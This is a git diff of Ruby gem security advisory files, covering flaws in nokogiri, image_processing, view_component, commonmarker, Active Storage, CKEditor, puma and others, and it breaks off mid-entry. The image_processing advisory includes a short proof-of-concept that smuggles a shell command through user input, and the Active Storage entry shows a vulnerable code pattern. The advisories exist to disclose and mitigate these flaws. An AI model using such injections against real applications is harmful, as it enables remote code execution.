+---
+layout: advisory
+title: 'CVE-2021-30560 (nokogiri): Update packaged libxml2 (2.9.12 → 2.9.13) and libxslt
+  (1.1.34 → 1.1.35)'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2021-30560
+  ghsa: fq42-c5rg-92c2
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-fq42-c5rg-92c2
+  date: 2022-02-21
+  title: Update packaged libxml2 (2.9.12 → 2.9.13) and libxslt (1.1.34 → 1.1.35)
+  description: |
+    ## Summary
+
+    Nokogiri v1.13.2 upgrades two of its packaged dependencies:
+
+    * vendored libxml2 from v2.9.12 to v2.9.13
+    * vendored libxslt from v1.1.34 to v1.1.35
+
+    Those library versions address the following upstream CVEs:
+
+    * libxslt: CVE-2021-30560 (CVSS 8.8, High severity)
+    * libxml2: CVE-2022-23308 (Unspecified severity, see more information below)
+
+    Those library versions also address numerous other issues including performance
+    improvements, regression fixes, and bug fixes, as well as memory leaks and other
+    use-after-free issues that were not assigned CVEs.
+
+    Please note that this advisory only applies to the CRuby implementation of
+    Nokogiri < 1.13.2, and only if the packaged libraries are being used. If you've
+    overridden defaults at installation time to use system libraries instead of
+    packaged libraries, you should instead pay attention to your distro's `libxml2`
+    and `libxslt` release announcements.
+
+    ## Mitigation
+
+    Upgrade to Nokogiri >= 1.13.2.
+
+    Users who are unable to upgrade Nokogiri may also choose a more complicated
+    mitigation: compile and link an older version Nokogiri against external libraries
+    libxml2 >= 2.9.13 and libxslt >= 1.1.35, which will also address these same CVEs.
+
+    ## Impact
+
+    * libxslt CVE-2021-30560
+    * CVSS3 score: 8.8 (High)
+
+    Fixed by https://gitlab.gnome.org/GNOME/libxslt/-/commit/50f9c9c
+
+    All versions of libxslt prior to v1.1.35 are affected.
+
+    Applications using untrusted XSL stylesheets to transform XML are vulnerable to
+    a denial-of-service attack and should be upgraded immediately.
+
+    libxml2 CVE-2022-23308
+    * As of the time this security advisory was published, there is no officially
+    published information available about this CVE's severity. The above NIST link
+    does not yet have a published record, and the libxml2 maintainer has declined
+    to provide a severity score.
+    * Fixed by https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12
+    * Further explanation is at https://mail.gnome.org/archives/xml/2022-February/msg00015.html
+
+    The upstream commit and the explanation linked above indicate that an application
+    may be vulnerable to a denial of service, memory disclosure, or code execution if
+    it parses an untrusted document with parse options `DTDVALID` set to true, and `NOENT`
+    set to false.
+
+    An analysis of these parse options:
+
+    * While `NOENT` is off by default for Document, DocumentFragment, Reader, and
+    Schema parsing, it is on by default for XSLT (stylesheet) parsing in Nokogiri
+    v1.12.0 and later.
+    * `DTDVALID` is an option that Nokogiri does not set for any operations, and so
+    this CVE applies only to applications setting this option explicitly.
+
+    It seems reasonable to assume that any application explicitly setting the parse
+    option `DTDVALID` when parsing untrusted documents is vulnerable and should be
+    upgraded immediately.
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 1.13.2"
+  related:
+    cve:
+    - 2021-30560
+    - 2022-23308
+---
diff --git a/advisories/_posts/2022-03-01-CVE-2022-24720.md b/advisories/_posts/2022-03-01-CVE-2022-24720.md
index 29bed7de..8f9a61c8 100644
--- a/advisories/_posts/2022-03-01-CVE-2022-24720.md
+++ b/advisories/_posts/2022-03-01-CVE-2022-24720.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2022-24720 (image_processing): Remote shell execution vulnerability when
-  applying commands from user input'
-comments: false
-categories:
-- image_processing
-advisory:
-  gem: image_processing
-  cve: 2022-24720
-  ghsa: cxf7-qrc5-9446
-  url: https://github.com/janko/image_processing/security/advisories/GHSA-cxf7-qrc5-9446
-  title: Remote shell execution vulnerability when applying commands from user input
-  date: 2022-03-01
-  description: |
-    ### Impact
-
-    When using the `#apply` method from image_processing to apply a series of operations that are coming from unsanitized user input, this allows the attacker to execute shell commands:
-
-    ```rb
-    ImageProcessing::Vips.apply({ system: "echo EXECUTED" })
-    #>> EXECUTED
-    ```
-
-    This method is called internally by Active Storage variants, so Active Storage is vulnerable as well.
-
-    ### Patches
-
-    The vulnerability has been fixed in version 1.12.2 of image_processing.
-
-    ### Workarounds
-
-    If you're processing based on user input, it's highly recommended that you always sanitize the user input, by allowing only a constrained set of operations. For example:
-
-    ```rb
-    operations = params[:operations]
-      .map { |operation| [operation[:name], *operation[:value]] }
-      .select { |name, *| name.to_s.include? %w[resize_to_limit strip ...] } # sanitization
-
-    ImageProcessing::Vips.apply(operations)
-    ```
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.12.2"
-  related:
-    url:
-    - https://github.com/janko/image_processing/commit/038e4574e8f4f4b636a62394e09983c71980dada
----
+---
+layout: advisory
+title: 'CVE-2022-24720 (image_processing): Remote shell execution vulnerability when
+  applying commands from user input'
+comments: false
+categories:
+- image_processing
+advisory:
+  gem: image_processing
+  cve: 2022-24720
+  ghsa: cxf7-qrc5-9446
+  url: https://github.com/janko/image_processing/security/advisories/GHSA-cxf7-qrc5-9446
+  title: Remote shell execution vulnerability when applying commands from user input
+  date: 2022-03-01
+  description: |
+    ### Impact
+
+    When using the `#apply` method from image_processing to apply a series of operations that are coming from unsanitized user input, this allows the attacker to execute shell commands:
+
+    ```rb
+    ImageProcessing::Vips.apply({ system: "echo EXECUTED" })
+    #>> EXECUTED
+    ```
+
+    This method is called internally by Active Storage variants, so Active Storage is vulnerable as well.
+
+    ### Patches
+
+    The vulnerability has been fixed in version 1.12.2 of image_processing.
+
+    ### Workarounds
+
+    If you're processing based on user input, it's highly recommended that you always sanitize the user input, by allowing only a constrained set of operations. For example:
+
+    ```rb
+    operations = params[:operations]
+      .map { |operation| [operation[:name], *operation[:value]] }
+      .select { |name, *| name.to_s.include? %w[resize_to_limit strip ...] } # sanitization
+
+    ImageProcessing::Vips.apply(operations)
+    ```
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.12.2"
+  related:
+    url:
+    - https://github.com/janko/image_processing/commit/038e4574e8f4f4b636a62394e09983c71980dada
+---
diff --git a/advisories/_posts/2022-03-02-CVE-2022-24722.md b/advisories/_posts/2022-03-02-CVE-2022-24722.md
index eb9ecb10..4f52c49b 100644
--- a/advisories/_posts/2022-03-02-CVE-2022-24722.md
+++ b/advisories/_posts/2022-03-02-CVE-2022-24722.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2022-24722 (view_component): XSS via `translate` method of `ViewComponent::Translatable`
-  in view_component gem'
-comments: false
-categories:
-- view_component
-advisory:
-  gem: view_component
-  cve: 2022-24722
-  ghsa: cm9w-c4rj-r2cf
-  url: https://github.com/github/view_component/security/advisories/GHSA-cm9w-c4rj-r2cf
-  title: XSS via `translate` method of `ViewComponent::Translatable` in view_component
-    gem
-  date: 2022-03-02
-  description: |
-    This is an XSS vulnerability that has the potential to impact anyone using
-    translations with the view_component gem. Data received via user input and
-    passed as an interpolation argument to the `translate` method is not properly
-    sanitized before display.
-
-    Versions 2.31.2 and 2.49.1 have been released and fully mitigate the vulnerability.
-
-    Avoid passing user input to the `translate` function, or sanitize the inputs
-    before passing them.
-  cvss_v3: 8.1
-  unaffected_versions:
-  - "< 2.31.0"
-  patched_versions:
-  - ">= 2.49.1"
-  - "~> 2.31.2"
-  related:
-    url:
-    - https://github.com/github/view_component/commit/3f82a6e62578ff6f361aba24a1feb2caccf83ff9
----
+---
+layout: advisory
+title: 'CVE-2022-24722 (view_component): XSS via `translate` method of `ViewComponent::Translatable`
+  in view_component gem'
+comments: false
+categories:
+- view_component
+advisory:
+  gem: view_component
+  cve: 2022-24722
+  ghsa: cm9w-c4rj-r2cf
+  url: https://github.com/github/view_component/security/advisories/GHSA-cm9w-c4rj-r2cf
+  title: XSS via `translate` method of `ViewComponent::Translatable` in view_component
+    gem
+  date: 2022-03-02
+  description: |
+    This is an XSS vulnerability that has the potential to impact anyone using
+    translations with the view_component gem. Data received via user input and
+    passed as an interpolation argument to the `translate` method is not properly
+    sanitized before display.
+
+    Versions 2.31.2 and 2.49.1 have been released and fully mitigate the vulnerability.
+
+    Avoid passing user input to the `translate` function, or sanitize the inputs
+    before passing them.
+  cvss_v3: 8.1
+  unaffected_versions:
+  - "< 2.31.0"
+  patched_versions:
+  - ">= 2.49.1"
+  - "~> 2.31.2"
+  related:
+    url:
+    - https://github.com/github/view_component/commit/3f82a6e62578ff6f361aba24a1feb2caccf83ff9
+---
diff --git a/advisories/_posts/2022-03-03-CVE-2024-22051.md b/advisories/_posts/2022-03-03-CVE-2024-22051.md
index 67d64e51..1eec6e51 100644
--- a/advisories/_posts/2022-03-03-CVE-2024-22051.md
+++ b/advisories/_posts/2022-03-03-CVE-2024-22051.md
@@ -1,67 +1,67 @@
----
-layout: advisory
-title: 'CVE-2024-22051 (commonmarker): Integer overflow in cmark-gfm table parsing
-  extension leads to heap memory corruption'
-comments: false
-categories:
-- commonmarker
-advisory:
-  gem: commonmarker
-  cve: 2024-22051
-  ghsa: fmx4-26r3-wxpf
-  url: https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-fmx4-26r3-wxpf
-  title: Integer overflow in cmark-gfm table parsing extension leads to heap memory
-    corruption
-  date: 2022-03-03
-  description: |
-    ### Impact
-
-    CommonMarker uses `cmark-gfm` for rendering
-    [Github Flavored Markdown](https://github.github.com/gfm/).
-
-    An [integer overflow in `cmark-gfm`'s table row parsing](https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x)
-    may lead to heap memory corruption when parsing tables who's marker
-    rows contain more than UINT16_MAX columns. The impact of this heap
-    corruption ranges from Information Leak to Arbitrary Code Execution.
-
-    If affected versions of CommonMarker are used for rendering remote
-    user controlled markdown, this vulnerability may lead to
-    Remote Code Execution (RCE).
-
-    ### Patches
-
-    This vulnerability has been patched in the following CommonMarker release:
-
-    - v0.23.4
-
-    ### Workarounds
-
-    The vulnerability exists in the table markdown extensions of
-    `cmark-gfm`. Disabling any use of the table extension will prevent
-    this vulnerability from being triggered.
-
-    ### References
-
-    - https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x
-
-    ### Acknowledgements
-
-    We would like to thank Felix Wilhelm of Google's Project Zero
-    for reporting this vulnerability
-
-    ### For more information
-
-    If you have any questions or comments about this advisory:
-
-    * Open an issue in [CommonMarker](http://github.com/gjtorikian/commonmarker)
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.23.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-22051
-    - https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x
-    - https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-fmx4-26r3-wxpf
-    - https://github.com/gjtorikian/commonmarker/commit/ab4504fd17460627a6ab255bc3c63e8e5fc6aed3
-    - https://github.com/advisories/GHSA-fmx4-26r3-wxpf
----
+---
+layout: advisory
+title: 'CVE-2024-22051 (commonmarker): Integer overflow in cmark-gfm table parsing
+  extension leads to heap memory corruption'
+comments: false
+categories:
+- commonmarker
+advisory:
+  gem: commonmarker
+  cve: 2024-22051
+  ghsa: fmx4-26r3-wxpf
+  url: https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-fmx4-26r3-wxpf
+  title: Integer overflow in cmark-gfm table parsing extension leads to heap memory
+    corruption
+  date: 2022-03-03
+  description: |
+    ### Impact
+
+    CommonMarker uses `cmark-gfm` for rendering
+    [Github Flavored Markdown](https://github.github.com/gfm/).
+
+    An [integer overflow in `cmark-gfm`'s table row parsing](https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x)
+    may lead to heap memory corruption when parsing tables who's marker
+    rows contain more than UINT16_MAX columns. The impact of this heap
+    corruption ranges from Information Leak to Arbitrary Code Execution.
+
+    If affected versions of CommonMarker are used for rendering remote
+    user controlled markdown, this vulnerability may lead to
+    Remote Code Execution (RCE).
+
+    ### Patches
+
+    This vulnerability has been patched in the following CommonMarker release:
+
+    - v0.23.4
+
+    ### Workarounds
+
+    The vulnerability exists in the table markdown extensions of
+    `cmark-gfm`. Disabling any use of the table extension will prevent
+    this vulnerability from being triggered.
+
+    ### References
+
+    - https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x
+
+    ### Acknowledgements
+
+    We would like to thank Felix Wilhelm of Google's Project Zero
+    for reporting this vulnerability
+
+    ### For more information
+
+    If you have any questions or comments about this advisory:
+
+    * Open an issue in [CommonMarker](http://github.com/gjtorikian/commonmarker)
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.23.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-22051
+    - https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x
+    - https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-fmx4-26r3-wxpf
+    - https://github.com/gjtorikian/commonmarker/commit/ab4504fd17460627a6ab255bc3c63e8e5fc6aed3
+    - https://github.com/advisories/GHSA-fmx4-26r3-wxpf
+---
diff --git a/advisories/_posts/2022-03-08-CVE-2022-21831.md b/advisories/_posts/2022-03-08-CVE-2022-21831.md
index 68b0b9c0..5e4f2646 100644
--- a/advisories/_posts/2022-03-08-CVE-2022-21831.md
+++ b/advisories/_posts/2022-03-08-CVE-2022-21831.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'CVE-2022-21831 (activestorage): Possible code injection vulnerability in Rails
-  / Active Storage'
-comments: false
-categories:
-- activestorage
-- rails
-advisory:
-  gem: activestorage
-  framework: rails
-  cve: 2022-21831
-  ghsa: w749-p3v6-hccq
-  url: https://groups.google.com/g/rubyonrails-security/c/n-p-W1yxatI
-  title: Possible code injection vulnerability in Rails / Active Storage
-  date: 2022-03-08
-  description: |
-    There is a possible code injection vulnerability in the Active Storage module
-    of Rails. This vulnerability has been assigned the CVE identifier
-    CVE-2022-21831.
-
-    Versions Affected:  >= 5.2.0
-    Not affected:       < 5.2.0
-    Fixed Versions:     7.0.2.3, 6.1.4.7, 6.0.4.7, 5.2.6.3
-
-    Impact
-    ------
-    There is a possible code injection vulnerability in the Active Storage module
-    of Rails.  This vulnerability impacts applications that use Active Storage
-    with the image_processing processing in addition to the mini_magick back end
-    for image_processing.
-
-    Vulnerable code will look something similar to this:
-
-    ```ruby
-    <%= image_tag blob.variant(params[:t] => params[:v]) %>
-    ```
-
-    Where the transformation method or its arguments are untrusted arbitrary
-    input.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Workarounds
-    -----------
-    To work around this issue, applications should implement a strict allow-list
-    on accepted transformation methods or arguments.  Additionally, a strict image
-    magick security policy will help mitigate this issue.
-
-      https://imagemagick.org/script/security-policy.php
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 5.2.0"
-  patched_versions:
-  - "~> 5.2.6, >= 5.2.6.3"
-  - "~> 6.0.4, >= 6.0.4.7"
-  - "~> 6.1.4, >= 6.1.4.7"
-  - ">= 7.0.2.3"
----
+---
+layout: advisory
+title: 'CVE-2022-21831 (activestorage): Possible code injection vulnerability in Rails
+  / Active Storage'
+comments: false
+categories:
+- activestorage
+- rails
+advisory:
+  gem: activestorage
+  framework: rails
+  cve: 2022-21831
+  ghsa: w749-p3v6-hccq
+  url: https://groups.google.com/g/rubyonrails-security/c/n-p-W1yxatI
+  title: Possible code injection vulnerability in Rails / Active Storage
+  date: 2022-03-08
+  description: |
+    There is a possible code injection vulnerability in the Active Storage module
+    of Rails. This vulnerability has been assigned the CVE identifier
+    CVE-2022-21831.
+
+    Versions Affected:  >= 5.2.0
+    Not affected:       < 5.2.0
+    Fixed Versions:     7.0.2.3, 6.1.4.7, 6.0.4.7, 5.2.6.3
+
+    Impact
+    ------
+    There is a possible code injection vulnerability in the Active Storage module
+    of Rails.  This vulnerability impacts applications that use Active Storage
+    with the image_processing processing in addition to the mini_magick back end
+    for image_processing.
+
+    Vulnerable code will look something similar to this:
+
+    ```ruby
+    <%= image_tag blob.variant(params[:t] => params[:v]) %>
+    ```
+
+    Where the transformation method or its arguments are untrusted arbitrary
+    input.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Workarounds
+    -----------
+    To work around this issue, applications should implement a strict allow-list
+    on accepted transformation methods or arguments.  Additionally, a strict image
+    magick security policy will help mitigate this issue.
+
+      https://imagemagick.org/script/security-policy.php
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 5.2.0"
+  patched_versions:
+  - "~> 5.2.6, >= 5.2.6.3"
+  - "~> 6.0.4, >= 6.0.4.7"
+  - "~> 6.1.4, >= 6.1.4.7"
+  - ">= 7.0.2.3"
+---
diff --git a/advisories/_posts/2022-03-16-CVE-2022-24728.md b/advisories/_posts/2022-03-16-CVE-2022-24728.md
index ebd1e3f4..79eb1187 100644
--- a/advisories/_posts/2022-03-16-CVE-2022-24728.md
+++ b/advisories/_posts/2022-03-16-CVE-2022-24728.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2022-24728 (ckeditor): Cross-site Scripting in CKEditor4'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2022-24728
-  ghsa: 4fc4-4p5g-6w89
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-4fc4-4p5g-6w89
-  title: Cross-site Scripting in CKEditor4
-  date: 2022-03-16
-  description: |-
-    ### Affected packages
-    The vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4.
-
-    ### Impact
-    A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.18.0.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.18.0.
-
-    ### For more information
-    Email us at security@cksource.com if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
-    The CKEditor 4 team would like to thank GHSL team member Kevin Backhouse ([@kevinbackhouse](https://github.com/kevinbackhouse)) for recognizing and reporting this vulnerability.
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-4fc4-4p5g-6w89
-    - https://github.com/ckeditor/ckeditor4/commit/d158413449692d920a778503502dcb22881bc949
-    - https://ckeditor.com/cke4/release/CKEditor-4.18.0
-    - https://www.drupal.org/sa-core-2022-005
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-24728
-    - https://securitylab.github.com/advisories/GHSL-2022-009_ckeditor4/
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOZGMCYDB2OKKULFXZKM6V7JJW4ZZHJP/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VR76VBN5GW5QUBJFHVXRX36UZ6YTCMW6/
-    - https://github.com/advisories/GHSA-4fc4-4p5g-6w89
----
+---
+layout: advisory
+title: 'CVE-2022-24728 (ckeditor): Cross-site Scripting in CKEditor4'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2022-24728
+  ghsa: 4fc4-4p5g-6w89
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-4fc4-4p5g-6w89
+  title: Cross-site Scripting in CKEditor4
+  date: 2022-03-16
+  description: |-
+    ### Affected packages
+    The vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4.
+
+    ### Impact
+    A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.18.0.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.18.0.
+
+    ### For more information
+    Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank GHSL team member Kevin Backhouse ([@kevinbackhouse](https://github.com/kevinbackhouse)) for recognizing and reporting this vulnerability.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-4fc4-4p5g-6w89
+    - https://github.com/ckeditor/ckeditor4/commit/d158413449692d920a778503502dcb22881bc949
+    - https://ckeditor.com/cke4/release/CKEditor-4.18.0
+    - https://www.drupal.org/sa-core-2022-005
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24728
+    - https://securitylab.github.com/advisories/GHSL-2022-009_ckeditor4/
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOZGMCYDB2OKKULFXZKM6V7JJW4ZZHJP/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VR76VBN5GW5QUBJFHVXRX36UZ6YTCMW6/
+    - https://github.com/advisories/GHSA-4fc4-4p5g-6w89
+---
diff --git a/advisories/_posts/2022-03-24-CVE-2021-3589.md b/advisories/_posts/2022-03-24-CVE-2021-3589.md
index a88e0457..e1df14e4 100644
--- a/advisories/_posts/2022-03-24-CVE-2021-3589.md
+++ b/advisories/_posts/2022-03-24-CVE-2021-3589.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2021-3589 (foreman_ansible): Missing Authentication for Critical Function
-  in Foreman Ansible'
-comments: false
-categories:
-- foreman_ansible
-advisory:
-  gem: foreman_ansible
-  cve: 2021-3589
-  ghsa: vvff-6wrr-4g7q
-  url: https://access.redhat.com/security/cve/CVE-2021-3589
-  title: Missing Authentication for Critical Function in Foreman Ansible
-  date: 2022-03-24
-  description: |
-    An authorization flaw was found in Foreman Ansible. An authenticated attacker
-    with certain permissions to create and run Ansible jobs can access hosts
-    through job templates. The highest threat from this vulnerability is to data
-    confidentiality and integrity as well as system availability.
-  cvss_v3: 9.9
-  patched_versions:
-  - ">= 2.0.0"
-  related:
-    url:
-    - https://bugzilla.redhat.com/show_bug.cgi?id=1969265
-    - https://github.com/theforeman/foreman_ansible/commit/a5e0827bc3ec6c8ab82f968907857a15646305d5
----
+---
+layout: advisory
+title: 'CVE-2021-3589 (foreman_ansible): Missing Authentication for Critical Function
+  in Foreman Ansible'
+comments: false
+categories:
+- foreman_ansible
+advisory:
+  gem: foreman_ansible
+  cve: 2021-3589
+  ghsa: vvff-6wrr-4g7q
+  url: https://access.redhat.com/security/cve/CVE-2021-3589
+  title: Missing Authentication for Critical Function in Foreman Ansible
+  date: 2022-03-24
+  description: |
+    An authorization flaw was found in Foreman Ansible. An authenticated attacker
+    with certain permissions to create and run Ansible jobs can access hosts
+    through job templates. The highest threat from this vulnerability is to data
+    confidentiality and integrity as well as system availability.
+  cvss_v3: 9.9
+  patched_versions:
+  - ">= 2.0.0"
+  related:
+    url:
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1969265
+    - https://github.com/theforeman/foreman_ansible/commit/a5e0827bc3ec6c8ab82f968907857a15646305d5
+---
diff --git a/advisories/_posts/2022-03-26-CVE-2022-0759.md b/advisories/_posts/2022-03-26-CVE-2022-0759.md
index fa8c6fc2..74f48a52 100644
--- a/advisories/_posts/2022-03-26-CVE-2022-0759.md
+++ b/advisories/_posts/2022-03-26-CVE-2022-0759.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2022-0759 (kubeclient): Improper Certificate Validation in kubeclient'
-comments: false
-categories:
-- kubeclient
-advisory:
-  gem: kubeclient
-  cve: 2022-0759
-  ghsa: 69p3-xp37-f692
-  url: https://github.com/ManageIQ/kubeclient/issues/554
-  title: Improper Certificate Validation in kubeclient
-  date: 2022-03-26
-  description: |
-    A flaw was found in all versions of kubeclient up to (but not including)
-    v4.9.3, the Ruby client for Kubernetes REST API, in the way it parsed kubeconfig
-    files. When the kubeconfig file does not configure custom CA to verify certs, kubeclient
-    ends up accepting any certificate (it wrongly returns VERIFY_NONE). Ruby applications
-    that leverage kubeclient to parse kubeconfig files are susceptible to Man-in-the-middle
-    attacks (MITM).
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 4.9.3"
-  related:
-    url:
-    - https://github.com/ManageIQ/kubeclient/issues/555
-    - https://github.com/ManageIQ/kubeclient/pull/556
----
+---
+layout: advisory
+title: 'CVE-2022-0759 (kubeclient): Improper Certificate Validation in kubeclient'
+comments: false
+categories:
+- kubeclient
+advisory:
+  gem: kubeclient
+  cve: 2022-0759
+  ghsa: 69p3-xp37-f692
+  url: https://github.com/ManageIQ/kubeclient/issues/554
+  title: Improper Certificate Validation in kubeclient
+  date: 2022-03-26
+  description: |
+    A flaw was found in all versions of kubeclient up to (but not including)
+    v4.9.3, the Ruby client for Kubernetes REST API, in the way it parsed kubeconfig
+    files. When the kubeconfig file does not configure custom CA to verify certs, kubeclient
+    ends up accepting any certificate (it wrongly returns VERIFY_NONE). Ruby applications
+    that leverage kubeclient to parse kubeconfig files are susceptible to Man-in-the-middle
+    attacks (MITM).
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 4.9.3"
+  related:
+    url:
+    - https://github.com/ManageIQ/kubeclient/issues/555
+    - https://github.com/ManageIQ/kubeclient/pull/556
+---
diff --git a/advisories/_posts/2022-03-30-CVE-2022-24790.md b/advisories/_posts/2022-03-30-CVE-2022-24790.md
index 88841476..ca679065 100644
--- a/advisories/_posts/2022-03-30-CVE-2022-24790.md
+++ b/advisories/_posts/2022-03-30-CVE-2022-24790.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2022-24790 (puma): HTTP Request Smuggling in puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2022-24790
-  ghsa: h99w-9q5r-gjq9
-  url: https://github.com/puma/puma/security/advisories/GHSA-h99w-9q5r-gjq9
-  title: HTTP Request Smuggling in puma
-  date: 2022-03-30
-  description: |
-    ### Impact
-
-    When using Puma behind a proxy that does not properly validate that the
-    incoming HTTP request matches the RFC7230 standard, Puma and the frontend
-    proxy may disagree on where a request starts and ends. This would allow
-    requests to be smuggled via the front-end proxy to Puma.
-
-    The following vulnerabilities are addressed by this advisory:
-    - Lenient parsing of `Transfer-Encoding` headers, when unsupported encodings
-      should be rejected and the final encoding must be `chunked`.
-    - Lenient parsing of malformed `Content-Length` headers and chunk sizes, when
-      only digits and hex digits should be allowed.
-    - Lenient parsing of duplicate `Content-Length` headers, when they should be
-      rejected.
-    - Lenient parsing of the ending of chunked segments, when they should end
-      with `\r\n`.
-
-    ### Patches
-
-    The vulnerability has been fixed in 5.6.4 and 4.3.12.
-
-    ### Workarounds
-
-    When deploying a proxy in front of Puma, turning on any and all functionality
-    to make sure that the request matches the RFC7230 standard.
-
-    These proxy servers are known to have "good" behavior re: this standard and
-    upgrading Puma may not be necessary. Users are encouraged to validate for
-    themselves.
-
-    - Nginx (latest)
-    - Apache (latest)
-    - Haproxy 2.5+
-    - Caddy (latest)
-    - Traefik (latest)
-
-    ### References
-
-    [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
-  cvss_v3: 9.1
-  patched_versions:
-  - "~> 4.3.12"
-  - ">= 5.6.4"
-  related:
-    url:
-    - https://github.com/puma/puma/commit/5bb7d202e24dec00a898dca4aa11db391d7787a5
----
+---
+layout: advisory
+title: 'CVE-2022-24790 (puma): HTTP Request Smuggling in puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2022-24790
+  ghsa: h99w-9q5r-gjq9
+  url: https://github.com/puma/puma/security/advisories/GHSA-h99w-9q5r-gjq9
+  title: HTTP Request Smuggling in puma
+  date: 2022-03-30
+  description: |
+    ### Impact
+
+    When using Puma behind a proxy that does not properly validate that the
+    incoming HTTP request matches the RFC7230 standard, Puma and the frontend
+    proxy may disagree on where a request starts and ends. This would allow
+    requests to be smuggled via the front-end proxy to Puma.
+
+    The following vulnerabilities are addressed by this advisory:
+    - Lenient parsing of `Transfer-Encoding` headers, when unsupported encodings
+      should be rejected and the final encoding must be `chunked`.
+    - Lenient parsing of malformed `Content-Length` headers and chunk sizes, when
+      only digits and hex digits should be allowed.
+    - Lenient parsing of duplicate `Content-Length` headers, when they should be
+      rejected.
+    - Lenient parsing of the ending of chunked segments, when they should end
+      with `\r\n`.
+
+    ### Patches
+
+    The vulnerability has been fixed in 5.6.4 and 4.3.12.
+
+    ### Workarounds
+
+    When deploying a proxy in front of Puma, turning on any and all functionality
+    to make sure that the request matches the RFC7230 standard.
+
+    These proxy servers are known to have "good" behavior re: this standard and
+    upgrading Puma may not be necessary. Users are encouraged to validate for
+    themselves.
+
+    - Nginx (latest)
+    - Apache (latest)
+    - Haproxy 2.5+
+    - Caddy (latest)
+    - Traefik (latest)
+
+    ### References
+
+    [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
+  cvss_v3: 9.1
+  patched_versions:
+  - "~> 4.3.12"
+  - ">= 5.6.4"
+  related:
+    url:
+    - https://github.com/puma/puma/commit/5bb7d202e24dec00a898dca4aa11db391d7787a5
+---
diff --git a/advisories/_posts/2022-03-31-CVE-2022-24803.md b/advisories/_posts/2022-03-31-CVE-2022-24803.md
index dfe851df..1ac075f8 100644
--- a/advisories/_posts/2022-03-31-CVE-2022-24803.md
+++ b/advisories/_posts/2022-03-31-CVE-2022-24803.md
@@ -1,57 +1,57 @@
----
-layout: advisory
-title: 'CVE-2022-24803 (asciidoctor-include-ext): Command Injection vulnerability
-  in asciidoctor-include-ext'
-comments: false
-categories:
-- asciidoctor-include-ext
-advisory:
-  gem: asciidoctor-include-ext
-  cve: 2022-24803
-  ghsa: v222-6mr4-qj29
-  url: https://github.com/jirutka/asciidoctor-include-ext/security/advisories/GHSA-v222-6mr4-qj29
